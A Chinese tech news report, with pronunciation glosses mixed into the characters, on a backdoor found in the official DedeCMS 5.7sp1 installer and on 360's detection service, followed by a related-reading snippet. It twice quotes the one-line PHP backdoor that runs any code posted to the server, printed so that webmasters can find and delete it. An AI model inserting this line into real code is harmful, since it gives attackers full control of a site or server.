360建議，使用DedeCMS的網(wǎng)站站長(zhǎng)應(yīng)立刻檢測(cè)include/shoper.class.php文件中是否存在后門(mén)代碼"@eval(file_get_contents('php://input'));"，如存在應(yīng)刪除該行代碼，如不存在則證明沒(méi)有該"一句話后門(mén)"。

【IT商業(yè)新聞網(wǎng)訊】日前，織夢(mèng)內(nèi)容管理系統(tǒng)（DedeCMS）遭烏云漏洞平臺(tái)曝光稱(chēng)，DedeCMS 5.7sp1官方安裝包被黑客植入后門(mén)。經(jīng)360安全檢測(cè)平臺(tái)檢測(cè)，該后門(mén)確實(shí)曾一度出現(xiàn)在織夢(mèng)官網(wǎng)版本中。為此，360于當(dāng)天緊急推出DedeCMS后門(mén)檢測(cè)服務(wù)，并已對(duì)大批中招網(wǎng)站發(fā)出郵件報(bào)警。

360網(wǎng)站安全檢測(cè)平臺(tái)服務(wù)網(wǎng)址：http://webscan.360.cn

圖1：DedeCms被植入的后門(mén)代碼

據(jù)悉，DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個(gè)人網(wǎng)站上，是國(guó)內(nèi)用戶量最大的PHP類(lèi)CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn)，此次DedeCMS曝出的后門(mén)名為"一句話后門(mén)"，其惡意代碼存在于DedeCMS購(gòu)物車(chē)類(lèi)文件中，凡是調(diào)用該購(gòu)物車(chē)類(lèi)的文件均會(huì)觸發(fā)后門(mén)，從而導(dǎo)致整個(gè)網(wǎng)站甚至服務(wù)器遭黑客進(jìn)一步控制。

360建議，使用DedeCMS的網(wǎng)站站長(zhǎng)應(yīng)立刻檢測(cè)include/shoper.class.php文件中是否存在后門(mén)代碼"@eval(file_get_contents('php://input'));"，如存在應(yīng)刪除該行代碼，如不存在則證明沒(méi)有該"一句話后門(mén)"。

作為開(kāi)源軟件，DedeCMS此次曝出后門(mén)并非個(gè)例。因?yàn)樵趪?guó)際上，Linux等多款著名的開(kāi)源軟件也曾遭黑客植入后門(mén)。不過(guò)，烏云漏洞平臺(tái)公開(kāi)的織夢(mèng)官方郵件顯示，織夢(mèng)開(kāi)發(fā)團(tuán)隊(duì)否認(rèn)了產(chǎn)品曾被植入后門(mén)，但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進(jìn)行了修改。

圖2：測(cè)試驗(yàn)證PHP代碼可被DedeCMS后門(mén)執(zhí)行

　　推薦閱讀

　　李開(kāi)復(fù)微博稱(chēng)中國(guó)O2O機(jī)會(huì)大 但并不好做

李開(kāi)復(fù)在微博寫(xiě)道：“O2O就是(1)幫助線上用戶發(fā)現(xiàn)和推薦消費(fèi)場(chǎng)所，(2)為線下服務(wù)業(yè)帶來(lái)線上客流，(3)可以檢測(cè)效果，最好可以線上支付。美國(guó)的O2O往往是幫助已上線的商家拉顧客，但是中國(guó)線下商家一般對(duì)互聯(lián)網(wǎng)認(rèn)知和接>>>詳細(xì)閱讀

本文標(biāo)題：DedeCMS官方版本驚曝后門(mén) 360緊急推出安全檢測(cè)

地址：http://m.sdlzkt.com/a/guandian/yejie/20111230/161793.html

 1/2    1  2 下一頁(yè)